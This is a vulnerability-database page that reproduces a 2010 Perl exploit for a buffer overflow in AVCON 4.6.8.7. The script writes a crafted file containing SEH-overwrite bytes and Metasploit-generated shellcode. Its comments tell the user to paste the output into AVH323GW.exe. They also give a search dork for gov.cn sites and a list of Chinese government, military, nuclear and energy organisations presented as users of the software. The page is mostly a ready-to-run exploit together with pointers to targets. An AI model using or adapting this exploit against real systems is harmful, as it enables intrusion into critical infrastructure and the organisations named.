Vulners
Lucene search
AVCON 4.6.8.7 Buffer Overflow
🗓️ 07 May 2010 00:00:00Reported by Dillon BeresfordType 
packetstorm🔗 packetstormsecurity.com👁 48 Views
`#!/usr/bin/perl
# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"
# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe
# Enjoy the wang chung++ and look for the other bugs. ;)
# 2 products from China and 2 0days in one month dizam!
# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police
# China's Shenyang Military Region
# China's Yunnan Frontier Corps
# China's Nuclear Agencies
# China Life Insurance Company
# China Pacific Insurance Group
# China National Petroleum Corporation
# Daqing Oilfield Material Group
# Grace Pai Henan Electric Power
# China Civil Aviation Information Group
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust
# National Grain and Oil Information Center
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration
my $exploit = "poc.txt";
my $junk = "\x41" x 1019;
my $nSEH = "\xeb\x06\x90\x90"; # jmp 6 bytes
my $SEH = pack('V',0x200504B4); # pop pop ret
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";
my $padding = "\x90" x 5000; # padding
my $payload = $junk.$nSEH.$SEH.$buf.$padding;
open (myfile,">$exploit");
print myfile $payload;
close (myfile);
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 May 2010 00:00Current
0.9Low risk
Vulners AI Score0.9